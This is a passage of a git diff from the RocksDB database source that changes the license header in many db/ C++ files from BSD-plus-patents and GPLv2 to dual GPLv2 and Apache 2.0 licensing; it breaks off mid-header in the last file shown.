b/db/db_iter_test.cc index 889d64bd124..1b7c13b06f3 100644 --- a/db/db_iter_test.cc +++ b/db/db_iter_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/db/db_iterator_test.cc b/db/db_iterator_test.cc index df09bccf760..90f43ea374d 100644 --- a/db/db_iterator_test.cc +++ b/db/db_iterator_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_log_iter_test.cc b/db/db_log_iter_test.cc index 84c8776a7a7..e7f94c4c423 100644 --- a/db/db_log_iter_test.cc +++ b/db/db_log_iter_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_memtable_test.cc b/db/db_memtable_test.cc index 1bf9a41c9c8..63d274f6ab5 100644 --- a/db/db_memtable_test.cc +++ b/db/db_memtable_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/db/db_merge_operator_test.cc b/db/db_merge_operator_test.cc index 7c842ff840c..de286191064 100644 --- a/db/db_merge_operator_test.cc +++ b/db/db_merge_operator_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/db/db_options_test.cc b/db/db_options_test.cc index 1d43f6b3c10..243748f9fa4 100644 --- a/db/db_options_test.cc +++ b/db/db_options_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_properties_test.cc b/db/db_properties_test.cc index d407624ebb3..b09fe1ffacc 100644 --- a/db/db_properties_test.cc +++ b/db/db_properties_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_range_del_test.cc b/db/db_range_del_test.cc index 99f61416c67..0288f80bdde 100644 --- a/db/db_range_del_test.cc +++ b/db/db_range_del_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/db_test_util.h" #include "port/stack_trace.h" diff --git a/db/db_sst_test.cc b/db/db_sst_test.cc index 644b765ef40..73c6fe8016d 100644 --- a/db/db_sst_test.cc +++ b/db/db_sst_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_statistics_test.cc b/db/db_statistics_test.cc index f7c054c5c1e..237a2c68141 100644 --- a/db/db_statistics_test.cc +++ b/db/db_statistics_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/db/db_table_properties_test.cc b/db/db_table_properties_test.cc index dcd6729f676..265e9cb2e1a 100644 --- a/db/db_table_properties_test.cc +++ b/db/db_table_properties_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_tailing_iter_test.cc b/db/db_tailing_iter_test.cc index fe2b048f3b9..d217828db9d 100644 --- a/db/db_tailing_iter_test.cc +++ b/db/db_tailing_iter_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_test.cc b/db/db_test.cc index 40e8e0accfd..70f54250ba9 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_test2.cc b/db/db_test2.cc index b1e1da4e014..aa10789c851 100644 --- a/db/db_test2.cc +++ b/db/db_test2.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 8de51b18c55..7de6cff3e7a 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_test_util.h b/db/db_test_util.h index 14d91ec2ed9..5fb3f0c81b7 100644 --- a/db/db_test_util.h +++ b/db/db_test_util.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_universal_compaction_test.cc b/db/db_universal_compaction_test.cc index 6b01b67e56d..c6334f8e067 100644 --- a/db/db_universal_compaction_test.cc +++ b/db/db_universal_compaction_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_wal_test.cc b/db/db_wal_test.cc index bb211cb34f7..461fe467391 100644 --- a/db/db_wal_test.cc +++ b/db/db_wal_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_write_test.cc b/db/db_write_test.cc index 42470990070..726f444fa16 100644 --- a/db/db_write_test.cc +++ b/db/db_write_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/db/dbformat.cc b/db/dbformat.cc index 2b299cd637e..20c54495aa0 100644 --- a/db/dbformat.cc +++ b/db/dbformat.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/dbformat.h b/db/dbformat.h index ff40ab015ac..0ffffc88f22 100644 --- a/db/dbformat.h +++ b/db/dbformat.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/dbformat_test.cc b/db/dbformat_test.cc index 884fdfda527..d96b5757afd 100644 --- a/db/dbformat_test.cc +++ b/db/dbformat_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/deletefile_test.cc b/db/deletefile_test.cc index 8624e84cfda..989c0c4118b 100644 --- a/db/deletefile_test.cc +++ b/db/deletefile_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/event_helpers.cc b/db/event_helpers.cc index a78c25caf54..1b79acb0f2c 100644 --- a/db/event_helpers.cc +++ b/db/event_helpers.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/event_helpers.h" diff --git a/db/event_helpers.h b/db/event_helpers.h index 91b9e3ea6b1..674e6c5f6fc 100644 --- a/db/event_helpers.h +++ b/db/event_helpers.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/db/experimental.cc b/db/experimental.cc index ad5c140f849..45d4d70aa82 100644 --- a/db/experimental.cc +++ b/db/experimental.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/experimental.h" diff --git a/db/external_sst_file_basic_test.cc b/db/external_sst_file_basic_test.cc index 72454112d02..534e8a0bf76 100644 --- a/db/external_sst_file_basic_test.cc +++ b/db/external_sst_file_basic_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/db/external_sst_file_ingestion_job.cc b/db/external_sst_file_ingestion_job.cc index 102ecbc05e9..58fa354463a 100644 --- a/db/external_sst_file_ingestion_job.cc +++ b/db/external_sst_file_ingestion_job.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/db/external_sst_file_ingestion_job.h b/db/external_sst_file_ingestion_job.h index 0215f59107b..2d0fadeed79 100644 --- a/db/external_sst_file_ingestion_job.h +++ b/db/external_sst_file_ingestion_job.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/db/external_sst_file_test.cc b/db/external_sst_file_test.cc index be31d4874a8..4a4e82e792d 100644 --- a/db/external_sst_file_test.cc +++ b/db/external_sst_file_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/db/fault_injection_test.cc b/db/fault_injection_test.cc index 5aa1bfdc20d..adfcb4db5a7 100644 --- a/db/fault_injection_test.cc +++ b/db/fault_injection_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright 2014 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/file_indexer.cc b/db/file_indexer.cc index 14134f4640e..abfa7cf4c68 100644 --- a/db/file_indexer.cc +++ b/db/file_indexer.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/file_indexer.h b/db/file_indexer.h index 3995c99edc2..1bef3aab0ca 100644 --- a/db/file_indexer.h +++ b/db/file_indexer.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/file_indexer_test.cc b/db/file_indexer_test.cc index 352bf36c0b4..5cd8c2d2cf6 100644 --- a/db/file_indexer_test.cc +++ b/db/file_indexer_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/filename_test.cc b/db/filename_test.cc index 330b2e788de..d6bde52834e 100644 --- a/db/filename_test.cc +++ b/db/filename_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/flush_job.cc b/db/flush_job.cc index 57a6ca7315e..846edb4074b 100644 --- a/db/flush_job.cc +++ b/db/flush_job.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/flush_job.h b/db/flush_job.h index 6a685c09f89..4698ae7b03d 100644 --- a/db/flush_job.h +++ b/db/flush_job.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/flush_job_test.cc b/db/flush_job_test.cc index e757b400491..34a3c983c33 100644 --- a/db/flush_job_test.cc +++ b/db/flush_job_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/db/flush_scheduler.cc b/db/flush_scheduler.cc index eb24efb9cf5..8735a6b369b 100644 --- a/db/flush_scheduler.cc +++ b/db/flush_scheduler.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/flush_scheduler.h" diff --git a/db/flush_scheduler.h b/db/flush_scheduler.h index 39d7423bc07..cd3575861a8 100644 --- a/db/flush_scheduler.h +++ b/db/flush_scheduler.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/db/forward_iterator.cc b/db/forward_iterator.cc index d496e2b7774..65fff95956d 100644 --- a/db/forward_iterator.cc +++ b/db/forward_iterator.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include "db/forward_iterator.h" diff --git a/db/forward_iterator.h b/db/forward_iterator.h index 4a212f3533b..d4f32cba9fa 100644 --- a/db/forward_iterator.h +++ b/db/forward_iterator.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/db/forward_iterator_bench.cc b/db/forward_iterator_bench.cc index 64d4b0508b6..e9ae770cfaf 100644 --- a/db/forward_iterator_bench.cc +++ b/db/forward_iterator_bench.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef __STDC_FORMAT_MACROS #define __STDC_FORMAT_MACROS diff --git a/db/internal_stats.cc b/db/internal_stats.cc index c2a528e831c..54723ea91f6 100644 --- a/db/internal_stats.cc +++ b/db/internal_stats.cc @@ -1,8 +1,6 @@ -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/internal_stats.h b/db/internal_stats.h index 5632b39c8b5..1dd393f73ce 100644 --- a/db/internal_stats.h +++ b/db/internal_stats.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// 